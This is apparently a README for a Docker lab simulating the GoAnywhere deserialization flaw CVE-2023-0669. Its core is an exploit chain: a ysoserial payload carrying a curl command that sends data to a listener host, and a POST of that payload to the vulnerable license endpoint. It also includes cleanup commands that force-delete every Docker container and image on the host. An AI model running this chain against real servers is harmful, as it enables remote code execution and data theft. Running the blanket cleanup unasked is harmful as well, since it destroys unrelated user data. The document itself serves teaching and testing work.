
CVE-2023-0669 के लिए सिमुलेशन वातावरण जिसमें Docker-आधारित हमलावर, संवेदनशील सर्वर और श्रोता कंटेनर शामिल हैं। डीसीरियलाइज़ेशन शोषण उत्पादन, पेलोड एन्क्रिप्शन और डेटा निष्कासन का प्रदर्शन करता है।
cve-2023-0669-simulation/ ├── docker-compose.yml ├── attacker/ │ ├── Dockerfile │ └── CVE_2023_0669_helper.java ├── vulnerable/ │ ├── Dockerfile │ └── VulnerableServer.java ├── listener/ │ ├── Dockerfile │ └── server.py └── received/ ← स्वचालित रूप से बनाया गया (exfiltration)
docker-compose up --build
docker compose up के दौरान KeyError: 'ContainerConfig' त्रुटिइस प्रोजेक्ट के लिए आवश्यक है:
docker compose down --remove-orphans
docker rm -f $(docker ps -aq)
docker rmi -f $(docker images -q)
फिर साफ-साफ पुनर्निर्माण करें:
docker compose build --no-cache
docker compose up
docker exec -it attacker bash
java -jar ysoserial-all.jar CommonsCollections6 'curl -s http://listener:8080/receive -d "PWNED-CVE-2023-0669-simulation-$(date)"' > payload.ser
java CVE_2023_0669_helper payload.ser 1
curl -X POST http://vulnerable:8001/goanywhere/lic/accept
-d "encryptedLicenseResponseData=LA_CHAÎNE_BASE64_ICI"
-d "acceptLicense=true"
आप लिसनर के लॉग (या अपने PC पर ./received फ़ोल्डर) में देखेंगे:
PWNED ! Reçu 42 bytes → PWNED-CVE-2023-0669-simulation-Sat 06 Dec 2025...